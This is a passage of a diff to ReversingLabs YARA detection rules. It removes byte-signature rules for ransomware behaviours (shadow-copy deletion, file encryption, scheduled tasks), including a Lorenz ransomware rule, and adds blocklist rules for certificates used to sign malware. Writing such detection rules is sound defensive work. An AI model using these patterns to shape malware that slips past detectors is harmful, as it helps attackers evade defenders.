-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ??
-            64 A3 ?? ?? ?? ?? 88 55 ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 80 7D ?? ?? 74 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 6A ??
-            6A ?? B2 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 33 D2 C6 45
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B
-            35 ?? ?? ?? ?? 0F 43 45 ?? 50 FF D6 85 C0 74 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? B0 ??
-            E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ??
-            8B CA C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 8D 79 ?? 66 8B 01 83 C1 ?? 66
-            85 C0 75 ?? 2B CF D1 F9 51 52 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ??
-            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 4D ?? 8D 4D ?? F3
-        }
-		$everything_library_setup_p2 = {
-            0F 7E 45 ?? C6 45 ?? ?? 83 7D ?? ?? FF 75 ?? 66 0F 7E C8 0F 11 4D ?? 0F 43 C8 66 0F
-            D6 45 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83
-            7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF D6 85 C0 74 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? B0
-            ?? EB ?? 8A 45 ?? C6 05 ?? ?? ?? ?? ?? 84 C0 74 ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ??
-            32 D2 E8 ?? ?? ?? ?? 8A C8 88 4D ?? 84 C9 75 ?? B2 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8A C8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 33 D2 84 C9 88 4D ?? 0F 44
-            C2 A2 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83
-            FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
-            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 8B 4D ??
-            64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3
-        }
-		$delete_shadow_copies_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F
-            88 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 85 C0 0F 88 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ??
-            ?? ?? ?? 80 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? 0F 45 C1 8D 4D ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 8B 00 8B 70 ?? E8 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ?? 51 6A ?? 50 FF 75
-            ?? FF D6 C7 45 ?? ?? ?? ?? ?? 83 CF ?? 8B 75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1
-            4E ?? 49 75 ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ??
-            8B 46 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 FF D3 83 7D ?? ?? 0F 8C ?? ?? ?? ??
-        }
-		$delete_shadow_copies_p2 = {
-            8B 45 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 00 8B 70 ?? 8B 45 ?? 89 45
-            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ??
-            51 FF 75 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 75 ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8B
-            75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1 4E ?? 49 75 ?? 85 F6 74 ?? 8B 06 85 C0 74
-            ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 78 ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8B 45 ?? 79
-            ?? 8B 08 50 FF 51 ?? 8B 45 ?? 50 8B 08 FF 51 ?? FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 00 68 ?? ?? ?? ?? 8B 40 ?? 89 45 ?? E8 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 30 85 F6 74 ?? 8B 36 EB ?? 33 F6 68 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ?? 51 6A ?? 6A
-            ?? 56 50 FF 75 ?? FF 55 ?? 8B 75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1 4E ?? 49 75
-            ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 85
-            C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83
-        }
-		$delete_shadow_copies_p3 = {
-            C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 85 F6 74 ?? F0 0F C1 7E ??
-            4F 75 ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46
-            ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 83 7D ?? ?? 7D ?? 8B 45 ?? 50 8B 08 FF 51 ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B
-            4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8D 55 ?? 52 8D 55
-            ?? 52 6A ?? 6A ?? 51 FF 50 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 6A ?? 6A ?? 52 8B
-            01 6A ?? 68 ?? ?? ?? ?? 51 FF 50 ?? 85 C0 78 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? FF 75 ??
-            8B 01 51 FF 50 ?? 85 C0 78 ?? FF 75 ?? 68 ?? ?? ?? ?? EB ?? 50 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 FF D3 8B 45 ?? 50 8B 08 FF 51 ?? 8B 4D ?? 85 C9 75 ??
-            8B 4D ?? 85 C9 74 ?? 8B 01 51 FF 50 ?? 8B 45 ?? 50 8B 08 FF 51 ?? 8B 45 ?? 50 8B 08
-            FF 51 ?? 8B 45 ?? 8B 08 50 FF 51 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 4D ?? 64 89
-            0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Danalis LLC" and pe.signatures [ i ] . serial == "4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" and 1608681600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_F5F9C8F8C33E4Ce84Dd48Fcb03Ccb075 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "74203aa1-e5d0-59d9-b9f8-b79f5fbe271e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12590-L12608"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "ac3bab3f5a93099f39b0862b419346d1eb3d0f75d86e121ba30626d496c46c57"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $write_console_log_p* ) ) and ( all of ( $get_system_information_p* ) ) and ( all of ( $everything_library_setup_p* ) ) and ( all of ( $delete_shadow_copies_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abdulkadir \\xC5\\x9Eahin" and ( pe.signatures [ i ] . serial == "00:f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" or pe.signatures [ i ] . serial == "f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" ) and 1545004800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Lorenz : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_57Fc55239F21F139978609E323097132 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Lorenz ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cc97dd15-d518-5d9f-9384-3dcf81e34e81"
-		date = "2022-10-24"
-		modified = "2022-10-24"
+		id = "e71d575c-5a30-5158-80ee-3508cdaf5636"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Lorenz.yara#L1-L252"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12610-L12626"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b8668fcc560d264c37e3fbb52d5a5f1223a282abd9e984b3109efe9ab454be9f"
+		logic_hash = "030bb847e524e672ee382e0284ba3f027920f60c70bbd153d4b9cdd2669e6a99"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Lorenz"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_v1_p1 = {
-            BE ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? A5 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? A5 A5 A4 8B 35 ?? ?? ?? ?? FF D6 89 85 ?? ?? ?? ?? 33 C0 50 68 ?? ?? ?? ?? 6A
-            ?? 50 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 85
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75
-            ?? FF D6 8B 3D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? FF D6 6A ?? FF B5 ?? ?? ?? ?? FF D7 6A ?? 6A ?? 53 FF B5 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? FF D6 8D 85 ?? ?? ?? ?? 33 DB 50 53 FF B5 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 53 FF B5 ?? ?? ?? ??
-            FF D7 6A ?? 8D 45 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 53 8B 9D ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B
-            0D ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? ?? ?? 66 89 4D ?? 8D 4D
-            ?? 89 85 ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 6A ?? 50 2B CA 8D 45 ?? 51 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 33 C0 50 50
-        }
-		$encrypt_files_v1_p2 = {
-            50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 D2 42 3B C2 75 ?? 83 BD ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 33 D2 42 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 03 8D
-            ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 89 8D ?? ?? ?? ?? 0F 44 C2 8D
-            8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 8D 4D ?? 51 6A ?? 50 6A ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 83 A5 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF B5 ??
-            ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 6A ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 FF B5 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 8B 85 ?? ?? ??
-            ?? 50 FF D6 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
-            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$find_files_v1_p1 = {
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 0F 57 C0 C6 45
-            ?? ?? 6A ?? 6A ?? 0F 11 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85
-            C0 74 ?? 89 18 89 58 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 08 8B 3D ?? ?? ?? ??
-            8B B5 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85
-            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D
-        }
-		$find_files_v1_p2 = {
-            8B 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ??
-            ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B B5 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 56 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ?? ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
-            B8 ?? ?? ?? ?? C3 C7 45 ?? ?? ?? ?? ?? 33 DB 8B 85 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 8D
-        }
-		$create_scheduled_task_v1 = {
-            FF 15 ?? ?? ?? ?? 33 FF 85 C0 74 ?? 8B CF 8A 84 0D ?? ?? ?? ?? 88 84 0D ?? ?? ?? ??
-            41 84 C0 75 ?? 8D BD ?? ?? ?? ?? 4F 8A 47 ?? 47 84 C0 75 ?? BE ?? ?? ?? ?? A5 A5 66
-            A5 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B 4B ?? 8B F0 89 BD ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8D 85 ??
-            ?? ?? ?? 2B CA 50 51 FF 73 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C4 ?? 8B
-            F2 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1
-            E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 41 84 C0 75 ?? 66 A1
-            ?? ?? ?? ?? 33 DB 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 66 89 01 A0 ?? ?? ?? ?? 53 53 88
-            41 ?? 8D 85 ?? ?? ?? ?? 50 57 53 53 FF D6 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 53 68
-            ?? ?? ?? ?? 57 53 53 FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection_v1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B
-            5D ?? 8D 44 24 ?? 56 57 8B 7D ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A
-            ?? 6A ?? 6A ?? 58 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 6A ?? 58 53 66 89 44 24
-            ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24
-            ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B CF 8D 51 ?? 8A 01 41 84 C0 75 ??
-            6A ?? 2B CA 51 57 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$check_mutex_v1 = {
-            E8 ?? ?? ?? ?? 59 59 56 C6 45 ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 50 FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 57 ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 59 FF 77 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 56 FF D3 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            56 FF 15 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 94 C0 85 FF 74 ?? 84
-            C0 74 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56
-        }
-		$find_files_v2 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 83 EC ?? 53
-            56 57 89 65 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45
-            ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D
-            ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ??
-            3B 45 ?? 0F 87 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
-            51 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8
-            ?? 72 ?? 6A ?? 40 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 56
-            8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
-            7D ?? 33 F6 8B 5D ?? 83 FE ?? 73 ?? 8B 0C B5 ?? ?? ?? ?? 8D 45 ?? 83 FF ?? 0F 43 C3
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 46 EB ?? 8D 4D ?? E8 ?? ??
-            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 8B 4D ?? 32 C0 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45
-        }
-		$encrypt_files_v2_p1 = {
